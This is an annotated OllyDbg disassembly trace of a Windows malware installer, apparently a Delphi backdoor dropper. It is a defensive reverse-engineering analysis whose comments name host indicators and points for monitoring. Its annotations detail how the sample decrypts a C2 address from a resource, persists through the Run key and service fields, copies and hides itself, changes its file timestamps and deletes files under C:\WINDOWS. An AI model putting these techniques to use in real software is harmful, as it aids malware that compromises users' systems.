;-----------------------------------------------------------------------
; 004745BC — installer entry region (OllyDbg trace of a 32-bit Windows
; sample). The fs:[eax] exception-frame prologue, the `mov dl,1`
; constructor flag and the eax/edx/ecx register arguments seen throughout
; this trace look like a Delphi build — confirm against the RTL.
;-----------------------------------------------------------------------
004745BC . E8 E721F9FF call Setup.004067A8 ; analyst: anti-debugging checks live in this call; worth single-stepping to see the technique
004745C1 . 33C0 xor eax,eax ; eax = 0, reused below as the fs:[0] offset
004745C3 . 55 push ebp
004745C4 . 68 67494700 push Setup.00474967 ; handler address for the exception record pushed below
004745C9 . 64:FF30 push dword ptr fs:[eax] ; save the previous fs:[0] (SEH chain head)
004745CC . 64:8920 mov dword ptr fs:[eax],esp ; link the new exception record in — try/except-style prologue
004745CF . E8 A4FBFFFF call Setup.00474178 ; analyst: step in (F7); the trace continues inside this call
;-----------------------------------------------------------------------
; 00463982 — reads the installer's string table / configuration.
; Register roles: ebx = object created from class reference [413010]
; (its virtual slot +0C returns item N for edx = N; slot +2C takes a
; string in edx); results land in globals 0047B46C..0047B47C.
; Helper guesses (RTL shape, confirm): 00404768 = assign string to a
; global, 00404BD4 = string -> PChar, 00403940 = free the object.
; Function starts before and ends after this window.
;-----------------------------------------------------------------------
00463982 . A1 10304100 mov eax,dword ptr ds:[413010] ; class reference (VMT) for the helper object
00463987 . E8 84FFF9FF call Setup.00403910 ; construct it; analyst: this is where the strings are fetched
0046398C . 8BD8 mov ebx,eax ; ebx = helper object
0046398E . 8B15 AC994700 mov edx,dword ptr ds:[4799AC] ; Setup.00479888
00463994 . 8B12 mov edx,dword ptr ds:[edx] ; (ASCII "SoftWare\Microsoft\Windows\CurrentVersion\Run — the autorun key; a classic persistence location worth monitoring
00463996 . 8BC3 mov eax,ebx
00463998 . 8B08 mov ecx,dword ptr ds:[eax] ; ecx = VMT
0046399A . FF51 2C call dword ptr ds:[ecx+2C] ; virtual slot +2C with the Run-key string in edx (Olly's ":\Program Files" hint here is probably stale)
0046399D . 8D4D F8 lea ecx,dword ptr ss:[ebp-8] ; out-string for item 0
004639A0 . 33D2 xor edx,edx ; index 0
004639A2 . 8BC3 mov eax,ebx
004639A4 . 8B30 mov esi,dword ptr ds:[eax]
004639A6 . FF56 0C call dword ptr ds:[esi+C] ; SoftWare\Microsoft\Windows\CurrentVersion\Run — slot +0C: item[0] -> [ebp-8]
004639A9 . 8B55 F8 mov edx,dword ptr ss:[ebp-8]
004639AC . B8 7CB44700 mov eax,Setup.0047B47C
004639B1 . E8 B20DFAFF call Setup.00404768 ; global 0047B47C := item[0]
004639B6 . 8D4D F4 lea ecx,dword ptr ss:[ebp-C] ; item 1
004639B9 . BA 01000000 mov edx,1
004639BE . 8BC3 mov eax,ebx
004639C0 . 8B30 mov esi,dword ptr ds:[eax]
004639C2 . FF56 0C call dword ptr ds:[esi+C] ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Setup") — a second registry path from the table
004639C5 . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
004639C8 . B8 78B44700 mov eax,Setup.0047B478
004639CD . E8 960DFAFF call Setup.00404768 ; global 0047B478 := item[1]
004639D2 . 8D4D F0 lea ecx,dword ptr ss:[ebp-10] ; item 2
004639D5 . BA 02000000 mov edx,2
004639DA . 8BC3 mov eax,ebx
004639DC . 8B30 mov esi,dword ptr ds:[eax]
004639DE . FF56 0C call dword ptr ds:[esi+C] ; config
004639E1 . 8B55 F0 mov edx,dword ptr ss:[ebp-10]
004639E4 . B8 74B44700 mov eax,Setup.0047B474
004639E9 . E8 7A0DFAFF call Setup.00404768 ; global 0047B474 := item[2] ("config")
004639EE . 8D4D EC lea ecx,dword ptr ss:[ebp-14] ; item 3
004639F1 . BA 03000000 mov edx,3
004639F6 . 8BC3 mov eax,ebx
004639F8 . 8B30 mov esi,dword ptr ds:[eax]
004639FA . FF56 0C call dword ptr ds:[esi+C]
004639FD . 8B55 EC mov edx,dword ptr ss:[ebp-14]
00463A00 . B8 70B44700 mov eax,Setup.0047B470
00463A05 . E8 5E0DFAFF call Setup.00404768 ; global 0047B470 := item[3]
00463A0A . 8D4D E8 lea ecx,dword ptr ss:[ebp-18] ; item 4
00463A0D . BA 04000000 mov edx,4
00463A12 . 8BC3 mov eax,ebx
00463A14 . 8B30 mov esi,dword ptr ds:[eax]
00463A16 . FF56 0C call dword ptr ds:[esi+C] ; (ASCII ":\Program Files")
00463A19 . 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00463A1C . B8 6CB44700 mov eax,Setup.0047B46C
00463A21 . E8 420DFAFF call Setup.00404768 ; global 0047B46C := item[4] (":\Program Files" — the drive letter is prepended elsewhere, presumably)
00463A26 . 8BC3 mov eax,ebx
00463A28 . E8 13FFF9FF call Setup.00403940 ; release the helper object (Free-like; confirm)
00463A2D . A1 70B44700 mov eax,dword ptr ds:[47B470]
00463A32 . E8 9D11FAFF call Setup.00404BD4 ; PChar(item[3])
00463A37 . 50 push eax ; parked until the pop below
00463A38 . A1 74B44700 mov eax,dword ptr ds:[47B474]
00463A3D . E8 9211FAFF call Setup.00404BD4 ; eax = PChar("config")
00463A42 . B9 00B54700 mov ecx,Setup.0047B500 ; ecx = "TFrom2" (analyst: the resource name, visible in a resource editor)
00463A47 . 5A pop edx ; edx = PChar(item[3])
00463A48 . E8 FBF9FFFF call Setup.00463448 ; analyst: step in — loads the encrypted config and the encrypted C2 ("上线") address from the resource (see 0046346F below)
00463A4D . 84C0 test al,al
00463A4F . 0F84 DF010000 je Setup.00463C34 ; config read failed -> bail out (analyst: "it's over")
00463A55 . E8 5631FAFF call <jmp.&kernel32.GetVersion> ; GetVersion
00463A5A . A9 00000080 test eax,80000000 ; high bit set = Win9x-family platform in GetVersion's legacy encoding
00463A5F . 75 0A jnz short Setup.00463A6B
00463A61 . C705 DC984700>mov dword ptr ds:[4798DC],-1 ; NT-family: flag [4798DC] := -1 (True)
00463A6B > 8D45 FC lea eax,dword ptr ss:[ebp-4] ; out-string
00463A6E . E8 BDFDFFFF call Setup.00463830 ; analyst: step in — decrypts the C2 address (see 00463864 below)
;-----------------------------------------------------------------------
; 0046346F — inside 00463448: pulls the encrypted configuration out of a
; resource of this executable (FindResource / LoadResource /
; SizeofResource / LockResource) into the string referenced by [ebp-4].
; The function begins before and ends after this window; the resource
; name/type arguments were pushed before 0046346F.
; Register roles: ebx = HRSRC, then resource size; esi = HGLOBAL;
; [47A664] = hModule.
;-----------------------------------------------------------------------
0046346F . FF15 AC984700 call dword ptr ds:[4798AC] ; kernel32.FindResourceA
00463475 . 8BD8 mov ebx,eax ; ebx = HRSRC
00463477 . 85DB test ebx,ebx
00463479 . 74 4A je short Setup.004634C5 ; resource missing -> skip the read
0046347B . 90 nop
0046347C . 53 push ebx ; hResInfo
0046347D . A1 64A64700 mov eax,dword ptr ds:[47A664]
00463482 . 50 push eax ; hModule
00463483 . FF15 B0984700 call dword ptr ds:[4798B0] ; kernel32.LoadResource
00463489 . 8BF0 mov esi,eax ; esi = resource data handle
0046348B . 85F6 test esi,esi
0046348D . 74 36 je short Setup.004634C5
0046348F . 90 nop
00463490 . 53 push ebx
00463491 . A1 64A64700 mov eax,dword ptr ds:[47A664]
00463496 . 50 push eax
00463497 . FF15 B4984700 call dword ptr ds:[4798B4] ; kernel32.SizeofResource
0046349D . 8BD8 mov ebx,eax ; ebx = byte size of the resource
0046349F . 90 nop
004634A0 . 8B45 FC mov eax,dword ptr ss:[ebp-4] ; [ebp-4] = pointer to the destination string variable, presumably (out-parameter)
004634A3 . 8BD3 mov edx,ebx
004634A5 . E8 B618FAFF call Setup.00404D60 ; size the destination to ebx bytes (SetLength-like; confirm)
004634AA . 8B45 FC mov eax,dword ptr ss:[ebp-4]
004634AD . E8 7A17FAFF call Setup.00404C2C ; pointer to the string's buffer (confirm)
004634B2 . 50 push eax ; kept for the copy that follows LockResource (outside this window)
004634B3 . 56 push esi ; /hResource
004634B4 . E8 8F37FAFF call <jmp.&kernel32.LockResource>; \LockResource -> pointer to the raw (still encrypted) config bytes
;-----------------------------------------------------------------------
; 00463864 — inside 00463830: derives the key material, runs the
; decryption and leaves the plaintext C2 address in [ebp-8]. The
; function starts before this window and continues after 004638F7.
; Register roles: esi = stream-like object built from class [413300];
; ebx = second object built from class [4542CC] over esi (a transform
; or reader — its nature is not visible here).
; Helper guesses (RTL shape, confirm): 004049D4 = Length, 00404C2C =
; buffer pointer, 00404D60 = SetLength, 004047AC = string assign.
;-----------------------------------------------------------------------
00463864 . E8 430FFAFF call Setup.004047AC ; analyst: this path yields ":\Program Files" once decrypted
00463869 . EB 76 jmp short Setup.004638E1 ; skip straight to the final decrypt below
0046386B . A1 00334100 mov eax,dword ptr ds:[413300] ; alternative path: build a stream-like object
00463870 . E8 9B00FAFF call Setup.00403910
00463875 . 8BF0 mov esi,eax
00463877 . 8B45 F8 mov eax,dword ptr ss:[ebp-8]
0046387A . E8 5511FAFF call Setup.004049D4 ; length of [ebp-8]
0046387F . 50 push eax
00463880 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00463883 . E8 A413FAFF call Setup.00404C2C ; pointer to its bytes
00463888 . 8BD0 mov edx,eax
0046388A . 8BC6 mov eax,esi
0046388C . 59 pop ecx ; ecx = length
0046388D . E8 F636FBFF call Setup.00416F88 ; esi.<method>(ptr, len) — feeds the input bytes into the object (presumably)
00463892 . 6A 00 push 0
00463894 . 6A 00 push 0
00463896 . 8BC6 mov eax,esi
00463898 . E8 A734FBFF call Setup.00416D44 ; esi.<method>(0, 0) — looks like a rewind/seek to the start; confirm
0046389D . 8BCE mov ecx,esi ; ecx = source object for the constructor
0046389F . B2 01 mov dl,1 ; dl = 1: "construct a new instance" flag
004638A1 . A1 CC424500 mov eax,dword ptr ds:[4542CC] ; class reference
004638A6 . E8 7910FFFF call Setup.00454924 ; new object wrapping esi (presumably)
004638AB . 8BD8 mov ebx,eax
004638AD . 6A 00 push 0
004638AF . 6A 00 push 0
004638B1 . 8BC3 mov eax,ebx
004638B3 . E8 8C34FBFF call Setup.00416D44 ; same (0, 0) call on ebx
004638B8 . 8BC3 mov eax,ebx
004638BA . 8B10 mov edx,dword ptr ds:[eax]
004638BC . FF12 call dword ptr ds:[edx] ; virtual slot 0 -> a size (it becomes the SetLength argument next)
004638BE . 8BD0 mov edx,eax
004638C0 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638C3 . E8 9814FAFF call Setup.00404D60 ; SetLength([ebp-8], size)
004638C8 . 8BC3 mov eax,ebx
004638CA . 8B10 mov edx,dword ptr ds:[eax]
004638CC . FF12 call dword ptr ds:[edx] ; size again
004638CE . 50 push eax
004638CF . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638D2 . E8 5513FAFF call Setup.00404C2C ; buffer pointer
004638D7 . 8BD0 mov edx,eax
004638D9 . 8BC3 mov eax,ebx
004638DB . 59 pop ecx ; ecx = size
004638DC . 8B38 mov edi,dword ptr ds:[eax]
004638DE . FF57 0C call dword ptr ds:[edi+C] ; ebx.<slot +0C>(buffer, size) — reads the processed bytes back into [ebp-8] (presumably)
004638E1 > 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; out-string for the plaintext
004638E4 . 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; eax = the key (analyst: "key goes into eax")
004638E7 . E8 1CA6FBFF call Setup.0041DF08 ; the decryption routine proper (analyst: step in if the algorithm interests you); output: the C2 address
004638EC . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
004638EF . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004638F2 . E8 B50EFAFF call Setup.004047AC ; [ebp-8] := plaintext
004638F7 . 8BC6 mov eax,esi ; function continues past this window
;-----------------------------------------------------------------------
; 00463AF2 — copies fields out of the decrypted configuration record
; (ebx = record base) into globals. The strings the analyst labels here
; (group name, description, display name) match the kinds of values later
; passed to CreateServiceA / ChangeServiceConfig2A, so they are what a
; defender sees in the Services list and in the service-install event;
; the pointer tables used at 004747EE.. are not resolved on this page, so
; confirm the mapping. Function starts before and ends after this window;
; the lines between 00463B4B and 00463BDC are elided in the trace.
; Helper guesses (confirm): 00404984 = string from (ptr at edx, max len
; at ecx), 00404768 = assign to global, 00464744 = %VAR% expansion.
;-----------------------------------------------------------------------
00463AF2 . E8 8D0EFAFF call Setup.00404984 ; "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE") — raw field, %ProgramFiles% unexpanded
00463AF7 . 8B45 DC mov eax,dword ptr ss:[ebp-24]
00463AFA . 8D55 E0 lea edx,dword ptr ss:[ebp-20]
00463AFD . E8 420C0000 call Setup.00464744 ; "C:\Program Files\Internet Explorer\IEXPLORE.EXE") — after expansion
00463B02 . 8B55 E0 mov edx,dword ptr ss:[ebp-20]
00463B05 . B8 C8B44700 mov eax,Setup.0047B4C8
00463B0A . E8 590CFAFF call Setup.00404768 ; global 0047B4C8 := expanded IEXPLORE.EXE path (how it is used is outside this window)
00463B0F . 8B83 B8010000 mov eax,dword ptr ds:[ebx+1B8]
00463B15 . A3 E8984700 mov dword ptr ds:[4798E8],eax ; [4798E8] := record+1B8 (dword)
00463B1A . 0FB743 74 movzx eax,word ptr ds:[ebx+74]
00463B1E . A3 88B44700 mov dword ptr ds:[47B488],eax ; [47B488] := record+74 (word)
00463B23 . 8D55 D8 lea edx,dword ptr ss:[ebp-28]
00463B26 . A1 A8B44700 mov eax,dword ptr ds:[47B4A8]
00463B2B . E8 2859FAFF call Setup.00409458 ; analyst: derives a name from [47B4A8]
00463B30 . 8B55 D8 mov edx,dword ptr ss:[ebp-28]
00463B33 . B8 ACB44700 mov eax,Setup.0047B4AC
00463B38 . E8 2B0CFAFF call Setup.00404768 ; global 0047B4AC := that name
00463B3D . 0FB743 76 movzx eax,word ptr ds:[ebx+76]
00463B41 . A3 B4B44700 mov dword ptr ds:[47B4B4],eax ; [47B4B4] := record+76 (word)
00463B46 . B8 B8B44700 mov eax,Setup.0047B4B8
00463B4B . 8D53 78 lea edx,dword ptr ds:[ebx+78] ; group name (fixed-size field at record+78); trace jumps ahead after this line
00463BDC . B8 FCB44700 mov eax,Setup.0047B4FC
00463BE1 . 8D93 DF010000 lea edx,dword ptr ds:[ebx+1DF] ; description (field at record+1DF)
00463BE7 . B9 64000000 mov ecx,64 ; at most 0x64 = 100 bytes
00463BEC . E8 930DFAFF call Setup.00404984 ; global 0047B4FC := description
00463BF1 . B8 F8B44700 mov eax,Setup.0047B4F8
00463BF6 . 8D93 43020000 lea edx,dword ptr ds:[ebx+243] ; display name (field at record+243); the copy into 0047B4F8 follows this window
;-----------------------------------------------------------------------
; 004745F5 — "am I already the installed copy?" check: compares a
; configured path (loaded before this window, converted to PChar here)
; with the running module's own path, case-insensitively. Equal -> jump
; to the exit path; otherwise fall into the single-instance mutex check.
;-----------------------------------------------------------------------
004745F5 . E8 DA05F9FF call Setup.00404BD4 ; PChar of the configured path (analyst: "copy path")
004745FA . 50 push eax ; lstrcmpiA arg 2
004745FB . 8D55 EC lea edx,dword ptr ss:[ebp-14] ; out-string
004745FE . 33C0 xor eax,eax ; index 0 -> own executable path (see 00402B7A below)
00474600 . E8 5FE5F8FF call Setup.00402B64 ; own module path (GetModuleFileNameA underneath)
00474605 . 8B45 EC mov eax,dword ptr ss:[ebp-14]
00474608 . E8 C705F9FF call Setup.00404BD4 ; PChar(own path)
0047460D . 50 push eax ; lstrcmpiA arg 1
0047460E . A1 4C9C4700 mov eax,dword ptr ds:[479C4C]
00474613 . 8B00 mov eax,dword ptr ds:[eax] ; function pointer from a runtime-filled table
00474615 . FFD0 call eax ; kernel32.lstrcmpiA) — indirect call; static triage will not see this API as a direct import (presumably)
00474617 . 85C0 test eax,eax
00474619 . 0F84 CF020000 je Setup.004748EE ; paths equal (already running from the install location) -> exit path
0047461F . E8 00FCFFFF call Setup.00474224 ; analyst: step in — single-instance mutex (next block)
;-----------------------------------------------------------------------
; 00474224 — single-instance guard: create a named mutex and exit if it
; already existed. (The "/nbsp;" in the gutter column is an HTML-export
; artefact of OllyDbg's jump-arrow column, not code.)
;-----------------------------------------------------------------------
00474224 /nbsp; B9 68424700 mov ecx,Setup.00474268 ; ASCII "SJhensoie23sdsf" — hard-coded mutex name: a host-based indicator for this sample
00474229 |. 83CA FF or edx,FFFFFFFF ; edx = -1 (True) -> bInitialOwner
0047422C |. 33C0 xor eax,eax ; eax = 0 -> lpMutexAttributes = NULL
0047422E |. E8 2D42FFFF call Setup.00468460 ; CreateMutexA wrapper (next block)
;-----------------------------------------------------------------------
; 00468460 — thin CreateMutexA wrapper (complete function).
; In:  eax = lpMutexAttributes, edx = bInitialOwner (any non-zero = True),
;      ecx = lpName
; Out: eax = mutex handle, or NULL on failure
; The cmp/sbb/inc/and sequence normalises edx to exactly 0 or 1:
;   edx != 0 -> cmp leaves CF=0 -> sbb gives 0  -> inc gives 1
;   edx == 0 -> cmp sets CF=1    -> sbb gives -1 -> inc gives 0
;-----------------------------------------------------------------------
00468460 /nbsp; 51 push ecx ; /MutexName
00468461 |. 83FA 01 cmp edx,1 ; |CF = (edx == 0)
00468464 |. 1BD2 sbb edx,edx ; |edx = -CF
00468466 |. 42 inc edx ; |edx = 1 - CF
00468467 |. 83E2 7F and edx,7F ; |mask; no effect on 0/1 (compiler's Boolean idiom)
0046846A |. 52 push edx ; |InitialOwner
0046846B |. 50 push eax ; |pSecurity
0046846C |. FF15 B8984700 call dword ptr ds:[4798B8] ; \CreateMutexA
00468472 \. C3 retn
; --- back in 00474224 after the wrapper returns ---
00474233 |. A3 70C64700 mov dword ptr ds:[47C670],eax ; global [47C670] := mutex handle
00474238 |. 833D 70C64700>cmp dword ptr ds:[47C670],0
0047423F |. 74 24 je short Setup.00474265 ; CreateMutexA failed outright -> just return (installation proceeds)
00474241 |. 90 nop
00474242 |. E8 F128F9FF call <jmp.&kernel32.GetLastError> ; [GetLastError
00474247 |. 3D B7000000 cmp eax,0B7 ; 0xB7 = 183 = ERROR_ALREADY_EXISTS: another instance owns the mutex
0047424C |. 75 17 jnz short Setup.00474265 ; first instance -> return and continue installing
0047424E |. A1 70C64700 mov eax,dword ptr ds:[47C670]
00474253 |. 50 push eax ; /hObject = the mutex handle just stored in [47C670] (Olly's static "=> NULL" hint is stale)
00474254 |. E8 9727F9FF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
00474259 |. 6A 00 push 0 ; uExitCode = 0
0047425B |. A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474260 |. 8B00 mov eax,dword ptr ds:[eax] ; runtime-resolved pointer, labelled kernel32.ExitProcess elsewhere in this trace
00474262 |. FFD0 call eax ; ExitProcess(0): the second instance quits silently
00474264 |. 90 nop
00474265 \> C3 retn
;-----------------------------------------------------------------------
; 004090DC — complete function: returns the last-write time of the file
; named by the string in eax as a packed DOS date/time, or -1 when the
; file is missing or is a directory. Shape matches Delphi's FileAge().
; In:  eax = file name (string)
; Out: eax = (DOS date << 16) | DOS time, or -1
; Frame: 0x14C bytes of locals; [ebp-14C] (local.83) is a WIN32_FIND_DATAA:
;   dwFileAttributes is its first dword, ftLastWriteTime sits at +0x14,
;   i.e. ebp-138 = local.78.
;-----------------------------------------------------------------------
004090DC /nbsp; 55 push ebp
004090DD |. 8BEC mov ebp,esp
004090DF |. 81C4 B4FEFFFF add esp,-14C ; reserve locals
004090E5 |. 53 push ebx ; callee-saved
004090E6 |. 8BD8 mov ebx,eax ; ebx = file name
004090E8 |. 8D85 B4FEFFFF lea eax,[local.83]
004090EE |. 50 push eax ; lpFindFileData
004090EF |. 8BC3 mov eax,ebx
004090F1 |. E8 DEBAFFFF call Setup.00404BD4 ; PChar(file name)
004090F6 |. 50 push eax ; |FileName
004090F7 |. E8 84D9FFFF call <jmp.&kernel32.FindFirstFile>; \FindFirstFileA
004090FC |. 83F8 FF cmp eax,-1 ; INVALID_HANDLE_VALUE -> not found
004090FF |. 74 34 je short Setup.00409135
00409101 |. 50 push eax ; /hSearch
00409102 |. E8 71D9FFFF call <jmp.&kernel32.FindClose> ; \FindClose — handle released at once; only the find data is kept
00409107 |. F685 B4FEFFFF>test byte ptr ss:[ebp-14C],10 ; dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10)
0040910E |. 75 25 jnz short Setup.00409135 ; directories report -1
00409110 |. 8D45 F4 lea eax,[local.3]
00409113 |. 50 push eax ; /pLocalFileTime
00409114 |. 8D85 C8FEFFFF lea eax,[local.78] ; |&ftLastWriteTime
0040911A |. 50 push eax ; |pFileTime
0040911B |. E8 48D9FFFF call <jmp.&kernel32.FileTimeToLoc>; \FileTimeToLocalFileTime
00409120 |. 8D45 FC lea eax,[local.1]
00409123 |. 50 push eax ; /pDOSTime -> low word of local.1
00409124 |. 8D45 FE lea eax,dword ptr ss:[ebp-2] ; |
00409127 |. 50 push eax ; |pDOSDate -> high word of local.1
00409128 |. 8D45 F4 lea eax,[local.3] ; |
0040912B |. 50 push eax ; |pFileTime = the local time just computed
0040912C |. E8 2FD9FFFF call <jmp.&kernel32.FileTimeToDos>; \FileTimeToDosDateTime
00409131 |. 85C0 test eax,eax
00409133 |. 75 07 jnz short Setup.0040913C ; conversion ok -> return the packed value
00409135 |> C745 FC FFFFF>mov [local.1],-1 ; not-found / directory / conversion-error sentinel
0040913C |> 8B45 FC mov eax,[local.1]
0040913F |. 5B pop ebx
00409140 |. 8BE5 mov esp,ebp
00409142 |. 5D pop ebp
00409143 \. C3 retn
;-----------------------------------------------------------------------
; 004746A8 — replace any previous copy of itself at the install path
; ([[479BE8]] = the configured/copied file path). Function starts before
; and continues after this window. The je condition was computed above.
;-----------------------------------------------------------------------
004746A8 . /74 6E je short Setup.00474718 ; analyst: "already self-copied?" — skip the clean-up when no copy is present
004746AA . |B8 B80B0000 mov eax,0BB8 ; 0xBB8 = 3000
004746AF . |E8 F8EFFEFF call Setup.004636AC ; analyst: reads the system up-time; what the 3000 means here is not visible — confirm
004746B4 . |6A 00 push 0 ; dwFileAttributes = 0: strip READONLY/HIDDEN/SYSTEM so the delete can succeed
004746B6 . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746BB . |8B00 mov eax,dword ptr ds:[eax]
004746BD . |E8 1205F9FF call Setup.00404BD4 ; PChar(install path)
004746C2 . |50 push eax ; lpFileName
004746C3 . |A1 449D4700 mov eax,dword ptr ds:[479D44]
004746C8 . |8B00 mov eax,dword ptr ds:[eax]
004746CA . |FFD0 call eax ; (kernel32.SetFileAttributesA) — runtime-resolved
004746CC . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746D1 . |8B00 mov eax,dword ptr ds:[eax]
004746D3 . |E8 904CF9FF call Setup.00409368 ; delete the old copy (the analyst labels 00409368 "deletefile" at 00462D70)
004746D8 . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746DD . |8B00 mov eax,dword ptr ds:[eax]
004746DF . |E8 604AF9FF call Setup.00409144 ; does it still exist? (file-search wrapper)
004746E4 . |84C0 test al,al
004746E6 . |74 30 je short Setup.00474718 ; gone -> proceed to the fresh copy
004746E8 . |6A 07 push 7 ; still there (in use, presumably): re-hide it — 7 = READONLY|HIDDEN|SYSTEM
004746EA . |A1 E89B4700 mov eax,dword ptr ds:[479BE8]
004746EF . |8B00 mov eax,dword ptr ds:[eax]
004746F1 . |E8 DE04F9FF call Setup.00404BD4
004746F6 . |50 push eax
004746F7 . |A1 449D4700 mov eax,dword ptr ds:[479D44]
004746FC . |8B00 mov eax,dword ptr ds:[eax]
004746FE . |FFD0 call eax ; SetFileAttributesA)
00474700 . |6A 00 push 0
00474702 . |A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474707 . |8B00 mov eax,dword ptr ds:[eax]
00474709 . |FFD0 call eax ; kernel32.ExitProcess — give up; the existing copy stays in place
;-----------------------------------------------------------------------
; 00474726 — the self-copy: CopyFileA(own path, destination, bFailIfExists).
; bFailIfExists and the destination PChar (in eax at 00474726) were set
; up before this window.
;-----------------------------------------------------------------------
00474726 . 50 push eax ; lpNewFileName (destination; value comes from above this window)
00474727 . 8D55 E4 lea edx,dword ptr ss:[ebp-1C] ; out-string
0047472A . 33C0 xor eax,eax ; index 0 -> own executable
0047472C . E8 33E4F8FF call Setup.00402B64 ; own module path
00474731 . 8B45 E4 mov eax,dword ptr ss:[ebp-1C]
00474734 . E8 9B04F9FF call Setup.00404BD4 ; PChar(own path)
00474739 . 50 push eax ; lpExistingFileName (source)
0047473A . A1 709D4700 mov eax,dword ptr ds:[479D70]
0047473F . 8B00 mov eax,dword ptr ds:[eax] ; (kernel32.CopyFileA)
00474741 . FFD0 call eax ; CopyFileA through a runtime-resolved pointer (analyst: "dynamic call")
00474743 . E8 8863F9FF call Setup.0040AAD0 ; current local time (next block); feeds the timestamp change at 0047477B
;-----------------------------------------------------------------------
; 0040AAD0 — GetLocalTime into a SYSTEMTIME on the stack (esp+8 after
; the 0x20-byte reservation). The function continues past this window;
; the conversion of that SYSTEMTIME into the return value is not shown.
;-----------------------------------------------------------------------
0040AAD0 /nbsp; 83C4 E0 add esp,-20 ; 32 bytes of scratch (SYSTEMTIME is 16 bytes)
0040AAD3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8]
0040AAD7 |. 50 push eax ; /pLocaltime
0040AAD8 |. E8 63C0FFFF call <jmp.&kernel32.GetLocalTime> ; \GetLocalTime
;-----------------------------------------------------------------------
; 0047477B — after the copy: rewrite the copied file's timestamp and set
; its attributes. A changed file time lets the dropped binary blend into
; a timeline, so an investigation should not rely on the file's dates
; alone — the service-install event and the mutex name are steadier
; anchors. The SetFileAttributesA call itself follows this window.
;-----------------------------------------------------------------------
0047477B . E8 A4E1FEFF call Setup.00462924 ; analyst: modifies the copied file's time (timestomping) using the local time fetched at 00474743
00474780 . A1 D89B4700 mov eax,dword ptr ds:[479BD8]
00474785 . 8B00 mov eax,dword ptr ds:[eax]
00474787 . 50 push eax ; dwFileAttributes = configured value at [[479BD8]]
00474788 . A1 E89B4700 mov eax,dword ptr ds:[479BE8]
0047478D . 8B00 mov eax,dword ptr ds:[eax]
0047478F . E8 4004F9FF call Setup.00404BD4 ; PChar(copied-file path) (analyst: "the path after self-copy")
00474794 . 50 push eax ; lpFileName
00474795 . A1 449D4700 mov eax,dword ptr ds:[479D44]
0047479A . 8B00 mov eax,dword ptr ds:[eax] ; SetFileAttributesA (runtime-resolved, same table entry as at 004746CA); the call is past this window
;-----------------------------------------------------------------------
; 00462CCC — enumerates C:\WINDOWS\*.dat and, for each match that passes
; the 00462B44 test, clears its attributes and deletes it (bootstat.dat
; is the example caught in the trace). The analyst's note says the loop
; "creates some .dat files"; only the delete side is visible in this
; window, so any re-creation must happen inside 00462B44 or later —
; confirm. Deletion of files under C:\WINDOWS is a good file-integrity-
; monitoring trigger. Function starts before this window.
; Helper guesses (confirm): 004092D8 / 00409328 / 0040934C = FindFirst /
; FindNext / FindClose wrappers, 00404A20 = concat, 0040490C = string
; copy, 00409368 = DeleteFile (the analyst's "deletefile").
;-----------------------------------------------------------------------
00462CCC . BA 3F000000 mov edx,3F ; 0x3F = attribute mask covering every attribute (faAnyFile-style; confirm)
00462CD1 . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; "C:\WINDOWS\*.dat")
00462CD4 . E8 FF65FAFF call Setup.004092D8 ; FindFirst
00462CD9 . 85C0 test eax,eax
00462CDB . 0F85 BB000000 jnz Setup.00462D9C ; non-zero = no match -> close the search and leave
00462CE1 > 8D85 98FEFFFF lea eax,dword ptr ss:[ebp-168] ; loop head: full path := dir + name
00462CE7 . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158] ; bootstat.dat (current match's name)
00462CED . 8B55 FC mov edx,dword ptr ss:[ebp-4] ; C:\WINDOWS\
00462CF0 . E8 2B1DFAFF call Setup.00404A20 ; "C:\WINDOWS\bootstat.dat")
00462CF5 . 8B85 98FEFFFF mov eax,dword ptr ss:[ebp-168]
00462CFB . E8 44FEFFFF call Setup.00462B44 ; per-file test (body not shown) -> al
00462D00 . 84C0 test al,al
00462D02 . 0F84 81000000 je Setup.00462D89 ; false -> next match
00462D08 . 33C0 xor eax,eax
00462D0A . 55 push ebp
00462D0B . 68 7F2D4600 push Setup.00462D7F ; try-frame around the delete; handler at 00462D7F
00462D10 . 64:FF30 push dword ptr fs:[eax]
00462D13 . 64:8920 mov dword ptr fs:[eax],esp
00462D16 . 6A 00 push 0 ; dwFileAttributes = 0
00462D18 . 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-16C]
00462D1E . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158]
00462D24 . 8B55 FC mov edx,dword ptr ss:[ebp-4]
00462D27 . E8 F41CFAFF call Setup.00404A20 ; rebuild the same path
00462D2C . 8B85 94FEFFFF mov eax,dword ptr ss:[ebp-16C] ; "C:\WINDOWS\bootstat.dat")
00462D32 . E8 9D1EFAFF call Setup.00404BD4 ; PChar
00462D37 . 50 push eax ; |FileName
00462D38 . FF15 C0984700 call dword ptr ds:[4798C0] ; \SetFileAttributesA — strip READONLY/HIDDEN/SYSTEM before deleting
00462D3E . 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]
00462D44 . 8B8D A8FEFFFF mov ecx,dword ptr ss:[ebp-158]
00462D4A . 8B55 FC mov edx,dword ptr ss:[ebp-4]
00462D4D . E8 CE1CFAFF call Setup.00404A20 ; and once more
00462D52 . 8B85 8CFEFFFF mov eax,dword ptr ss:[ebp-174]
00462D58 . E8 771EFAFF call Setup.00404BD4
00462D5D . 8BD0 mov edx,eax
00462D5F . 8D85 90FEFFFF lea eax,dword ptr ss:[ebp-170]
00462D65 . E8 A21BFAFF call Setup.0040490C ; [ebp-170] := copy of the path
